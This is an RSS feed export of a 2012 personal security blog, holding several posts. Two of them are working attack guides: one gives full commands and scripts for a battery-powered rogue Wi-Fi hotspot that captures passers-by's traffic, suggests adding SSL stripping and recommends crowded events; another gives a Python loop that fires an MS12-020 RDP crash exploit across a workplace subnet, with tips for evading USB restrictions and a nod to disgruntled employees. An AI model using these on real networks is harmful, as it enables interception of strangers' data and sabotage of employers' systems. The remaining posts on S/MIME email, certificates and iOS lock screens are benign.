<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>En-Lightn</title>
	<atom:link href="http://www.en-lightn.com/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://www.en-lightn.com</link>
	<description>Home of Nick Schroedl</description>
	<lastBuildDate>Thu, 17 May 2012 02:41:19 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>Mobile Hacking at it&#8217;s Best!</title>
		<link>http://www.en-lightn.com/?p=392</link>
		<comments>http://www.en-lightn.com/?p=392#comments</comments>
		<pubDate>Thu, 17 May 2012 01:44:07 +0000</pubDate>
		<dc:creator>Nick Schroedl</dc:creator>
				<category><![CDATA[En-Lightn.com]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[Alix]]></category>
		<category><![CDATA[bridge]]></category>
		<category><![CDATA[debian]]></category>
		<category><![CDATA[fakeap]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[honey pot]]></category>
		<category><![CDATA[iPhone]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[MITM]]></category>
		<category><![CDATA[sniff]]></category>
		<category><![CDATA[wifi]]></category>

		<guid isPermaLink="false">http://www.en-lightn.com/?p=392</guid>
		<description><![CDATA[I have always loved wireless security.  It is just such an easy target.  The only issue that I have had is that I was restricted to carrying around a laptop and I just didn&#8217;t like the idea of having to operate the software while I was out.  So I came up with this neat little [...]]]></description>
			<content:encoded><![CDATA[<p>I have always loved wireless security.  It is just such an easy target.  The only issue that I have had is that I was restricted to carrying around a laptop and I just didn&#8217;t like the idea of having to operate the software while I was out.  So I came up with this neat little COMPLETELY mobile wireless hacking/trap solution.  Here is what you will need.</p>
<p><strong>Equipment</strong></p>
<p>1. an Alix board, CF, and enclosure<br />
2. two ALPHA USB Wireless cards<br />
3. a cell phone that you can tether to<br />
4. mobile power solution</p>
<p><strong>****  NOTES ****</strong></p>
<p>I have written this very quickly and this may not be entirely accurate.  Although the tests that I have done did work this post has been put together using loose notes that I made through my testing.  I may (one day) return to this and tidy it up and add more detail, however I set out to do what I wanted and I wish to move on to newer projects.</p>
<p><strong>Instructions</strong></p>
<p>1.     To start build your Alix system.  I built mine with Debian and I found a GREAT tutorial on how to get it loaded on a CF for your Alix board here -&gt; <a title="Debian Linux Install" href="http://www.youtube.com/watch?v=6VPsgR4pMik" target="_blank">http://www.youtube.com/watch?v=6VPsgR4pMik </a> Install the most basic packages to to run the system, we will add the other stuff later.</p>
<p>2.     Once you have Debian installed on the CF and the board put together go ahead and start  it up.  Connect to the Alix board with a serial connection using 38400 baud, or 9600 if you didn&#8217;t change it in the last step.</p>
<p>3.     Log in to Debian using root and your password</p>
<p>4.     rm -f /etc/udev/rules.d/*_persistent-net.rules</p>
<p>5.     rm -f /etc/udev/rules.d/*_persistent-net-generator.rules</p>
<p>6.     reboot and connect the two USB WLAN cards</p>
<p>7.     Once the system is back up and running log in again with root</p>
<p>8.     install the following packages using the next command</p>
<p>9.     apt-get install wpasupplicant bridge-utils wireless-tools tcpdump ssh</p>
<p>10.    change the file /etc/network/interfaces to look like this (obviously use your wlan interfaces)</p>
<p><code># Used by ifup(8) and ifdown(8). See the interfaces(5) manpage or<br />
# /usr/share/doc/ifupdown/examples for more information.<br />
auto lo<br />
iface lo inet loopback<br />
allow-hotplug eth0<br />
iface eth0 inet dhcp<br />
iface wlan1 inet dhcp<br />
wpa-ssid "iPhone"<br />
wpa-mode managed<br />
wpa-conf /root/Rogue-Sniff/conf/iphone.conf<br />
wpa-psk nodule5958<br />
</code><br />
11.    Now we will need to install a bunch more stuff to get the necessary tools running</p>
<p>12.    apt-get install apt-get install build-essential libssl-dev subversion check install iw</p>
<p>13.    svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng</p>
<p>14.    Make, check install, and then run airodump-ng-oui-update</p>
<p>15.    Time to get the FakeAP up and running</p>
<p>16.    apt-get install dhcp3-server</p>
<p>17.    update-rc.d sic-dhcp-server remove</p>
<p>18.    cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.bak</p>
<p>19.    vi /etc/dhcp/dhcpd.conf and make it similar to this</p>
<p><code>ddns-update-style ad-hoc;<br />
default-lease-time 600;<br />
max-lease-time 7200;<br />
subnet 10.1.2.0 netmask 255.255.255.0 {<br />
option subnet-mask 255.255.255.0;<br />
option broadcast-address 10.1.2.255;<br />
option routers 10.1.2.1;<br />
option domain-name-servers 8.8.8.8;<br />
range 10.1.2.100 10.1.2.150;<br />
}</code></p>
<p>20.    airmon-ng start wlan0</p>
<p>21.    airbase-ng -e &#8220;ESSID&#8221; -c 9 mon0</p>
<p>22.    ifconfig at0 up</p>
<p>23.    ifconfig at0 10.1.2.1 netmask 255.255.255.0</p>
<p>24.    route add -net 10.1.2.0 netmask 255.255.255.0 gw 10.1.2.1</p>
<p>25.    dhcpd -cf /etc/dhcpd/dhcpd.conf -pf /var/run/dhcpd.pid at0</p>
<p>26.    Now you have an AP up and running for the sniffing but you know no one will use it unless you have it providing internet access</p>
<p>27.    Connect the Debian box to your cell phone (tethering) so that you can provide internet access to others on the go</p>
<p>28.    Create the file iPhone.conf and put the WPA/WPA2 settings in to tether to your phone</p>
<p><code>network={<br />
ssid="iPhone"<br />
key_mgmt=WPA-PSK<br />
psk=(put your hex in here -&gt; wpa_passphrase [SSID] [passphrase])<br />
}</code></p>
<p>29.    Test out the connection by running the following</p>
<p>30.    wpa_supplicant -i wlan1 -B -c iphone.conf</p>
<p>31.    Get IP Tables running by creating the following script</p>
<p><code>#!/bin/sh<br />
PATH=/usr/sbin:/sbin:/bin:/usr/bin<br />
#<br />
# delete all existing rules.<br />
#<br />
iptables -F<br />
iptables -t nat -F<br />
iptables -t mangle -F<br />
iptables -X<br />
# Always accept loopback traffic<br />
iptables -A INPUT -i lo -j ACCEPT<br />
# Allow established connections, and those not coming from the outside<br />
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT<br />
iptables -A INPUT -m state --state NEW -j ACCEPT<br />
iptables -A FORWARD -i wlan1 -o at0 -m state --state ESTABLISHED,RELATED -j ACCEPT<br />
# Allow outgoing connections from the LAN side.<br />
iptables -A FORWARD -i at0 -o wlan1 -j ACCEPT<br />
iptables -t nat -A PREROUTING -p tcp -i at0 --destination-port 80 -j REDIRECT --to-port 8080<br />
# Masquerade.<br />
iptables -t nat -A POSTROUTING -o wlan1 -j MASQUERADE<br />
# Don't forward from the outside to the inside.<br />
iptables -A FORWARD -i wlan1 -o wlan1 -j REJECT<br />
# Enable routing.<br />
echo 1 &gt; /proc/sys/net/ipv4/ip_forward<br />
</code><br />
32.    If that is all working for you create a bash script with the following (with values that will work for your network)</p>
<p><code>#! /bin/bash<br />
# bring up the rogue and start sniffing<br />
cd /<br />
# change the mac to a Linksys AP<br />
/usr/bin/macchanger --mac=00:06:25:3E:BD:93 wlan0<br />
/usr/bin/macchanger -r wlan1<br />
echo "connecting to phone"<br />
/sbin/wpa_supplicant -i wlan1 -B -c /root/iphone.conf<br />
sleep 45<br />
echo "getting ip address"<br />
/sbin/dhclient wlan1<br />
/usr/local/sbin/airbase-ng --essid hotspot -c 11 wlan0 &amp;<br />
sleep 15<br />
/sbin/ifconfig at0 10.1.1.2 netmask 255.255.255.0<br />
/sbin/route add -net 10.1.1.0 netmask 255.255.255.0 gw 10.1.1.2<br />
/sbin/ifconfig at0 up<br />
sleep 5<br />
/usr/sbin/dhcpd -cf /etc/dhcp/dhcpd.conf<br />
./root/Rogue-Sniff/iptables.sh<br />
tcpdump -i wlan1 -s 0 -e -vv -XX link[25] != 0x80 -w /root/Rogue-Sniff/capture</code></p>
<p>33.    Add a line to execute this script at startup with rc.local</p>
<p>34.    Now that your CF card is at a point where you want it pull it off the Alix board and DD it to another Linux box so that you will never have to go through all this again.</p>
<p>35.    Connect your portable power source and out the door you go!  I used two 9V batteries that do power the setup, but I highly doubt that it would last long.</p>
<p><strong>Going Further</strong></p>
<p>1.     When acting as an AP for people the main point here is to sniff traffic and record it.  What point would it be to record encrypted traffic?  Go a little further with this and throw SSL Strip into the mix!</p>
<p>2.     Very Useful Applications (if you have room on the CF)<br />
python<br />
python-twisted-web<br />
kismet<br />
nmap<br />
telnet<br />
fping<br />
smbclient<br />
curl<br />
links<br />
dnsutils<br />
Tenable Nessus<br />
Metasploit Framework</p>
<p>3.     The best places to take advantage of wireless networks is in highly populated areas that do not have hotspots.  Think of a convention or parade.  Some people really what to get on the net, and you could even highjack their broadcasts &#8230; say they are probing for &#8220;linksys&#8221; why not rename your SSID?</p>
<p><strong>Photos of My Project</strong></p>
<p><a href="http://www.en-lightn.com/wp-content/uploads/2012/05/IMG_0796.png"><img class="aligncenter size-medium wp-image-409" title="IMG_0796" src="http://www.en-lightn.com/wp-content/uploads/2012/05/IMG_0796-300x224.png" alt="" width="300" height="224" /></a></p>
<p>&nbsp;</p>
<p><a href="http://www.en-lightn.com/wp-content/uploads/2012/05/IMG_0798.png"><img class="aligncenter size-medium wp-image-410" title="IMG_0798" src="http://www.en-lightn.com/wp-content/uploads/2012/05/IMG_0798-300x224.png" alt="" width="300" height="224" /></a></p>
<p>&nbsp;</p>
<p><a href="http://www.en-lightn.com/wp-content/uploads/2012/05/IMG_0800.png"><img class="aligncenter size-medium wp-image-411" title="IMG_0800" src="http://www.en-lightn.com/wp-content/uploads/2012/05/IMG_0800-300x224.png" alt="" width="300" height="224" /></a></p>
<p>&nbsp;</p>
<p><a href="http://www.en-lightn.com/wp-content/uploads/2012/05/IMG_0802.png"><img class="aligncenter size-medium wp-image-412" title="IMG_0802" src="http://www.en-lightn.com/wp-content/uploads/2012/05/IMG_0802-224x300.png" alt="" width="224" height="300" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.en-lightn.com/?feed=rss2&#038;p=392</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>One Really Good Reason iOS &gt; Droid</title>
		<link>http://www.en-lightn.com/?p=387</link>
		<comments>http://www.en-lightn.com/?p=387#comments</comments>
		<pubDate>Wed, 09 May 2012 23:42:33 +0000</pubDate>
		<dc:creator>Nick Schroedl</dc:creator>
				<category><![CDATA[En-Lightn.com]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[app]]></category>
		<category><![CDATA[Apple]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[encryption]]></category>
		<category><![CDATA[iOS]]></category>
		<category><![CDATA[smime]]></category>

		<guid isPermaLink="false">http://www.en-lightn.com/?p=387</guid>
		<description><![CDATA[After numerous posts on smime encrypted emails with iOS I decided to look at what the android devices can do. I recently have gotten my hands on a Motorola Xoom, and with all my devices the software is [at the time of writing this] currently up to date. The goal here was to use my [...]]]></description>
			<content:encoded><![CDATA[<p>After numerous posts on smime encrypted emails with iOS I decided to look at what the android devices can do.  I recently have gotten my hands on a Motorola Xoom, and with all my devices the software is [at the time of writing this] currently up to date.  The goal here was to use my private smime key with the mail application and other people&#8217;s public keys to send and receive encrypted email.</p>
<p>The intended goal could not be accomplished &#8230; Why?  Android currently does not support smime!  WTF?  Now before anyone starts commenting that they were able to do this, remember what the goal was.  There are apps out there for android that will support smime, but I wanted to use the “mail” app that came with my device. </p>
<p>This definitely is (in my mind) a huge failure for the android OS.  Apple’s iOS has got them beat hands down on this one.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.en-lightn.com/?feed=rss2&#038;p=387</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft and SHA2 256 Certs</title>
		<link>http://www.en-lightn.com/?p=381</link>
		<comments>http://www.en-lightn.com/?p=381#comments</comments>
		<pubDate>Sat, 07 Apr 2012 19:14:39 +0000</pubDate>
		<dc:creator>Nick Schroedl</dc:creator>
				<category><![CDATA[En-Lightn.com]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[256 2048]]></category>
		<category><![CDATA[Certificate]]></category>
		<category><![CDATA[ie]]></category>
		<category><![CDATA[internet explorer]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[RSA]]></category>
		<category><![CDATA[SHA2]]></category>
		<category><![CDATA[SSL]]></category>
		<category><![CDATA[tls]]></category>

		<guid isPermaLink="false">http://www.en-lightn.com/?p=381</guid>
		<description><![CDATA[This has got to be one of the stupidest things that I have ran into for a while. and out of all people the Department of Homeland Security were the ones that helped us out!  First it seamed as though it was a Citrix issue, then as we dug deeper we knew that it was [...]]]></description>
			<content:encoded><![CDATA[<p>This has got to be one of the stupidest things that I have ran into for a while. and out of all people the Department of Homeland Security were the ones that helped us out!  First it seamed as though it was a Citrix issue, then as we dug deeper we knew that it was the cert causing issues.</p>
<p>Symptoms</p>
<p>On a Windows 2003 (replicated as well on a 2008 R2 server) server or an XP client you get an error page from IE saying &#8220;Internet Explorer cannot display the webpage&#8221; but you know your internet connection is up and the server is up as well.  To double check that the server is actually up check the site on your phone, or another computer.</p>
<p>I also tried accessing this site from a CAIN Live CD and received a message from Epiphany Web Browser saying &#8220;Unable to load page.  Problem occurred while loading the URL https://somesite.com  SSL handshake failed: A TLS packet with unexpected length was received.</p>
<p>The FIX (for XP and 2003)</p>
<p>This is almost impossible to find but MS has a patch to fix this issue.  You have to ask nicely for it though.  Just go to <a href="http://support.microsoft.com/kb/968730">http://support.microsoft.com/kb/968730</a> and read all about it.  Now why something like this not included in Windows Update?</p>
]]></content:encoded>
			<wfw:commentRss>http://www.en-lightn.com/?feed=rss2&#038;p=381</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>IOS 5 Exploits &#8211; How Safe is Your Locked iPhone 4?</title>
		<link>http://www.en-lightn.com/?p=374</link>
		<comments>http://www.en-lightn.com/?p=374#comments</comments>
		<pubDate>Mon, 26 Mar 2012 23:20:30 +0000</pubDate>
		<dc:creator>Nick Schroedl</dc:creator>
				<category><![CDATA[En-Lightn.com]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[Apple]]></category>
		<category><![CDATA[call]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[facetime]]></category>
		<category><![CDATA[iOS]]></category>
		<category><![CDATA[iPad]]></category>
		<category><![CDATA[iPhone]]></category>
		<category><![CDATA[locked ios device]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.en-lightn.com/?p=374</guid>
		<description><![CDATA[First off let me say I absolutely love Apple products, however for the longest time they were not that popular. Now that the install base has become so large in the last 10 years malicious coders are starting to realize the benefit of exploiting not only Mac OSX but also IOS. I am against IOS [...]]]></description>
			<content:encoded><![CDATA[<p>First off let me say I absolutely love Apple products, however for the longest time they were not that popular.  Now that the install base has become so large in the last 10 years malicious coders are starting to realize the benefit of exploiting not only Mac OSX but also IOS.  I am against IOS jail breaking and have not even tried it on any of my devices, but that doesn’t mean that you can’t exploit your IOS device.</p>
<p>I just ran into this today and was amazed that I haven’t heard of it until now.  Published on February 5, 2012 “Ade Barkah” claims that he can get information from your address book, make phone calls, and even start a FaceTime call on a locked iPhone 4 with IOS 5.  I had my doubts that this would still work, so I grabbed my iPhone 4 with IOS 5.1 and gave it a try.</p>
<p>The first thing that I noticed was that I still had voice dialing enabled.  Holly Crap! **Thunk** should have had a V8!  Well beside the fact that my phone wasn’t locked down all that good it did get me to turn off voice dialing.  WHY Though?!  Apple still has not fixed the exploits that were published in February!  Read all about getting into the device (simply) when it is locked <a href="http://peekay.org/2012/02/05/more-fun-with-locked-iphone-4/" title="http://peekay.org/2012/02/05/more-fun-with-locked-iphone-4/" target="_blank">here</a>.  The article goes through step by step on getting information out of a locked iPhone 4, how to place calls, and even place a FaceTime call.</p>
<p>So this makes me start to think, what else has Apple ignored?  What was the last thing like this I heard about?  The iPad 2 “smart cover unlock”!  For those of you that haven’t heard of this or tried it, it is really cool.  What you do is take an iPad 2 and lock the screen.  Then close the smart cover.  Open the smart cover and hold the power button until you see the slide to shutdown screen.  Close the smart cover, and then open it again.  You still see the slide to shutdown screen.  Tap “cancel” … WTF?!  Yep, that’s right, your iPad2 is now unlocked.</p>
<p>Could this really still work?  I gave ‘er a whirl on an iPad 3 and … Nope.  Apple fixed this one.  So how is it that a company would fix this issue (even though very old) that was posted on a similar blog, and ignore something from February when IOS 5.1 was still not released?  Is this exploit hardware related?  I was able to confirm that the exploits for the iPhone 4 did work, and they also worked on the iPhone 3GS.  I would like to find out if it would actually work on an iPhone 4S I just have to get my hands on one first.</p>
<p>Now everyone knows how secretive Apple is when it comes to development, and security.  Its fine, I actually think it is a huge reason that the company has such successful launches.  I even watch the blogs when the keynote starts!  But where do you draw the line between secrecy to protect your intellectual property, and letting your customers know when they may be at risk?  This is something that troubles me.  Who knows what zero days are out there for Mac OSX and IOS, that Apple and a few black hats know about?  Ask yourself this now.  How safe do you feel with all that information on your iPad, and iPhone … that may not be as safe as you think it is?</p>
]]></content:encoded>
			<wfw:commentRss>http://www.en-lightn.com/?feed=rss2&#038;p=374</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>More Free Info Sec Training</title>
		<link>http://www.en-lightn.com/?p=371</link>
		<comments>http://www.en-lightn.com/?p=371#comments</comments>
		<pubDate>Sat, 24 Mar 2012 00:22:37 +0000</pubDate>
		<dc:creator>Nick Schroedl</dc:creator>
				<category><![CDATA[En-Lightn.com]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[certification]]></category>
		<category><![CDATA[Computer]]></category>
		<category><![CDATA[free]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[learn]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[offensive security]]></category>
		<category><![CDATA[script kiddie]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[skiddie]]></category>
		<category><![CDATA[teach]]></category>
		<category><![CDATA[training]]></category>

		<guid isPermaLink="false">http://www.en-lightn.com/?p=371</guid>
		<description><![CDATA[This day in age I am surprised that the community does so much for free. I stumbled upon some more free MetaSploit training today. This course is from the guys at offensive security. If you haven&#8217;t heard of the offensive security certifications they are known to be the hardest, and most intense info sec exams [...]]]></description>
			<content:encoded><![CDATA[<p>This day in age I am surprised that the community does so much for free.  I stumbled upon some more free MetaSploit training today.  This course is from the guys at offensive security.  If you haven&#8217;t heard of the offensive security certifications they are known to be the hardest, and most intense info sec exams out there.  They should almost guarantee hair loss, sleep deprivation, and caffeine overdose!</p>
<p>If you are new to MetaSploit or just want to learn more go to <a href="http://www.offensive-security.com/metasploit-unleashed/Main_Page" title="http://www.offensive-security.com/metasploit-unleashed/Main_Page">http://www.offensive-security.com/metasploit-unleashed/Main_Page</a> and start learning for free.  However if you can spare some cash they do take donations that go to HFC (Hackers For Charity).</p>
]]></content:encoded>
			<wfw:commentRss>http://www.en-lightn.com/?feed=rss2&#038;p=371</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Internal Network Take Down &#8211; A How To</title>
		<link>http://www.en-lightn.com/?p=312</link>
		<comments>http://www.en-lightn.com/?p=312#comments</comments>
		<pubDate>Tue, 20 Mar 2012 23:30:40 +0000</pubDate>
		<dc:creator>Nick Schroedl</dc:creator>
				<category><![CDATA[En-Lightn.com]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[BSOD]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[How To Hack]]></category>
		<category><![CDATA[internal network]]></category>
		<category><![CDATA[KB2621440]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[MS12-020]]></category>
		<category><![CDATA[PoC]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[RDP]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.en-lightn.com/?p=312</guid>
		<description><![CDATA[First off this information is public, I am not the one to publish this exploit and I am not trying to take credit for the PoC code that was released. However what I am doing is proving many wrong that think the PoC code is not dangerous. This information should be used for testing your [...]]]></description>
			<content:encoded><![CDATA[<p>First off this information is public, I am not the one to publish this exploit and I am not trying to take credit for the PoC code that was released. However what I am doing is proving many wrong that think the PoC code is not dangerous. This information should be used for testing your systems ONLY. I am not responsible for what you do.</p>
<p>So to start off you will need the PoC code that was posted on PasteBin.com I am not going to link to it but a quick Google search will give you what you need. Copy the RAW paste to a text file and save it as RDP_Exploit.py That really is all you need to do. If your computer at work has Python installed on it skip ahead. Most people will need the next few steps.</p>
<p>Download Portable Python and install it on your flash drive at home. This is real easy so I am not going to go indepth on this. But for the lazy people out there use these links.</p>
<p><a href="http://www.portablepython.com/" title="http://www.portablepython.com/" target="_blank">http://www.portablepython.com/</a><br />
<a href="http://www.portablepython.com/wiki/Download" title="http://www.portablepython.com/wiki/Download" target="_blank">http://www.portablepython.com/wiki/Download</a><br />
<a href="http://www.portablepython.com/wiki/Documentation" title="http://www.portablepython.com/wiki/Documentation" target="_blank">http://www.portablepython.com/wiki/Documentation</a></p>
<p>OK so now here is how you take this nice little PoC that causes a BSOD to screw your work network right over! Again DO NOT DO THIS unless you are willing to accept the consequences, which is usually 1-Loose your job and 2-Legal proceedings. The aim here is to take down a complete subnet. Most admins leave TCP:3389 open and listening on all servers in the data center so that they can work. Rarely they go through the trouble of ensuring that only IT staff can connect on these ports. This is where it gets fun.</p>
<p>Figure out what subnet you wish to attack at work is. This can be done with a combination of tracert, ping, and nslookup. Shouldn&#8217;t be too hard to get this information. Hell if you can&#8217;t figure it out, just go after the biggest dog in the network, which is usually the Active Directory server. From a dos prompt type &#8220;ping [domain].[com, ca, local, whatever]&#8221; this will give you an ip. Use your smarts to figure out the subnet.</p>
<p>Create another text file and save it as RDP_Attack.py or download <a href="http://www.en-lightn.com/wp-content/uploads/2012/03/RDP_Attack.txt" title="http://www.en-lightn.com/wp-content/uploads/2012/03/RDP_Attack.txt" target="_blank">this</a> and rename it. Now hopefully your attack subnet was a class C because this is how I wrote the file to work. If not feel free to change the python to work for you. Save the following text in the file. If you copy and paste from this page you will need to fix the python.  Replace all the quotes with single quotes.  Sorry but WordPress kind of sucks, but it is convenient.  </p>
<p><code>#<br />
# MS12-020 subnet attack with pastebin.com PoC<br />
#<br />
import os<br />
import sys</code></p>
<p>NET = sys.argv[1]</p>
<p>for i in range(1,255):<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for j in range(1,16):<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print &#8216;Attacking &#8216;+NET+&#8217;.'+str(i)+&#8217; attempt #&#8217;+str(j)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print os.system(&#8216;&#8221;portable python 2.7.2.1\App\python.exe&#8221; RDP_Exploit.py &#8216;+NET+&#8217;.'+str(i))</code></p>
<p>Now to get your payload ready.  Get a USB thumb drive and copy the two python files that you saved to it.  Your drive structure should be something like this</p>
<p>F:\RDP_Exploit.py<br />
F:\RDP_Attack.py<br />
F:\Portable Python 2.7.2.1<br />
F:\Portable Python 2.7.2.1\[all the python files]</p>
<p>So what do you do if your company has prevented the use of USB drives.  Just get creative.  Think encrypted archive files through SFTP, FTPS, HTTP, HTTPS ... hell the list goes on.  All you need to do is get all these files onto a local system in your target attack network.</p>
<p>Once you get these files onto the system inside the network (I am going to assume the USB flash worked on F: for my example) all you need to do is launch the attack on the subnet you identified earlier.  REMEMBER THE SECOND PYTHON FILE WAS FOR A CLASS C NETWORK ONLY!  Open a command promt and enter the following:</p>
<p>F:<br />
"Portable Python 2.7.2.1\App\python.exe" RDP_Attack.py [your class c net]</p>
<p>When your class c net is entered above format it like 10.1.1 or 192.168.1  You may notice that you attack each system 15 times.  I found that when running the actual exploit most times it would not work the first time that I executed it.  This is why that happens if you were wondering.  So if everything goes right (wrong for the admins) you have just taken down a crap load of servers!</p>
<p>There you go if there are un-patched servers that you can connect to on TCP:3389 you should take them all down.  I will be the first to admit that this is very slow but it is just to illustrate the point.  The python in RDP_Attack.py can be altered to make the attack very fast.  This is only one way that a piece of PoC code that causes a BSOD can be used to wreak mass disruption.  More of a DoS attack than anything else but if you are that certain disgruntle employee out there ...</p>
<p>**AGAIN IF YOU USE THIS MALICIOUSLY YOU WILL GET CAUGHT AND I AM NOT RESPONSIBLE**</p>
]]></content:encoded>
			<wfw:commentRss>http://www.en-lightn.com/?feed=rss2&#038;p=312</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Free Email Encryption &#8211; Part 2 &#8211; IOS Devices</title>
		<link>http://www.en-lightn.com/?p=341</link>
		<comments>http://www.en-lightn.com/?p=341#comments</comments>
		<pubDate>Tue, 20 Mar 2012 23:30:03 +0000</pubDate>
		<dc:creator>Nick Schroedl</dc:creator>
				<category><![CDATA[En-Lightn.com]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[cipher]]></category>
		<category><![CDATA[Computer]]></category>
		<category><![CDATA[computer security]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[encryption]]></category>
		<category><![CDATA[free]]></category>
		<category><![CDATA[iPad]]></category>
		<category><![CDATA[iPhone]]></category>
		<category><![CDATA[iPod]]></category>
		<category><![CDATA[mail]]></category>
		<category><![CDATA[outlook]]></category>
		<category><![CDATA[pop3]]></category>
		<category><![CDATA[protect]]></category>
		<category><![CDATA[safe communications]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[smtp]]></category>
		<category><![CDATA[SSL]]></category>

		<guid isPermaLink="false">http://www.en-lightn.com/?p=341</guid>
		<description><![CDATA[It has now come up in my life that I wanted to enable SMIME Encryption on my emails outbound from my IOS devices. I send lots of mail from my iPhone, iPad, and iPod with information that should not be sent in plain text. So I thought that while I set up all my devices [...]]]></description>
			<content:encoded><![CDATA[<p>It has now come up in my life that I wanted to enable SMIME Encryption on my emails outbound from my IOS devices. I send lots of mail from my iPhone, iPad, and iPod with information that should not be sent in plain text. So I thought that while I set up all my devices I would share with everyone how to do it.</p>
<p><strong>Creating and Exporting Your Private and Public Key</strong></p>
<p>1. Open Internet Explorer. DO NOT USE ANY OTHER BROWSER. I just couldn&#8217;t get this working in Chrome or Safari.</p>
<p>2. Go to <a title="http://www.comodo.com/home/email-security/free-email-certificate.php" href="http://www.comodo.com/home/email-security/free-email-certificate.php" target="_blank">http://www.comodo.com/home/email-security/free-email-certificate.php</a> and click on &#8220;Download Now&#8221;.</p>
<p>3. Fill out the information on the page. You must fill this out with honest information or your signing/encryption may not work. Leave the key size at 2048 and click next.</p>
<p>4. When prompted let the browser perform the certificate tasks for you. When the certificate tasks are done do not close your browser (if you have multiple browsers).</p>
<p>5. Open your email and click the link to retrieve your certificate. If this page is not opened in IE then copy and paste the link into the Internet Explorer browser that you left open.</p>
<p>6. Again let the browser perform the certificate tasks to complete the installation.</p>
<p>7. To get the certificate on your IOS device you will need to export the public and private keys from IE. To do this click &#8220;tools&#8221;, then &#8220;internet options&#8221; from IE. In the new window that opened click the &#8220;content&#8221; tab.</p>
<p>8. Now click on the button labeled &#8220;Certificates&#8221;.</p>
<p>9. On The &#8220;Personal&#8221; tab in the new window that opened you should see a certificate with your email address as the &#8220;issued to&#8221;. click on this cert once, then click the &#8220;Export&#8221; button.<br />
<a href="http://www.en-lightn.com/wp-content/uploads/2012/03/IECert.png"><img class="aligncenter size-medium wp-image-346" title="IECert" src="http://www.en-lightn.com/wp-content/uploads/2012/03/IECert-233x300.png" alt="" width="233" height="300" /></a></p>
<p>10. An MS wizard opens and click Next, Ensure you export the private key and click Next, Select PKCS #12 and &#8220;Include all Certificates in the certification path if possible&#8221;. If you are not going to use the cert on the desktop that you installed it on select the option to delete the private key. Now click next. Enter a STRONG password in the box (at least 15 charactors containing 3 of the 4 charactor sets). The need for a strong password is just good practice as well as you are probably going to send this through email. Click Next. Click Browse and give your file a name and select a place to save it. Click Next. Click Finish, and you should see a message letting you know the export was successfull. Again if you are not going to use this cert on the desktop you created it on delete the cert now from the Certificates window.</p>
<p>11. Close the windows that were opened in the previous steps.</p>
<p><strong>Installing Your Private and Public Key in IOS</strong></p>
<p>1. email yourself the certificate file you created in step 10.</p>
<p>2. On your IOS device open that email.</p>
<p>3. Tap on the PFX attachment</p>
<p><a href="http://www.en-lightn.com/wp-content/uploads/2012/03/IMG_0678.png"><img class="aligncenter size-medium wp-image-347" title="IMG_0678" src="http://www.en-lightn.com/wp-content/uploads/2012/03/IMG_0678-200x300.png" alt="" width="200" height="300" /></a></p>
<p>4. You will get a Certificate window after the prompt. In this window select Install.<br />
<a href="http://www.en-lightn.com/wp-content/uploads/2012/03/IMG_0679.png"><img src="http://www.en-lightn.com/wp-content/uploads/2012/03/IMG_0679-200x300.png" alt="" title="IMG_0679" width="200" height="300" class="aligncenter size-medium wp-image-364" /></a></p>
<p>5. Enter your IOS password (if you have one)<br />
<a href="http://www.en-lightn.com/wp-content/uploads/2012/03/IMG_0680.png"><img src="http://www.en-lightn.com/wp-content/uploads/2012/03/IMG_0680-200x300.png" alt="" title="IMG_0680" width="200" height="300" class="aligncenter size-medium wp-image-360" /></a></p>
<p>6. Now enter the password for the certificate file.  This is the password you entered in the previous section.<br />
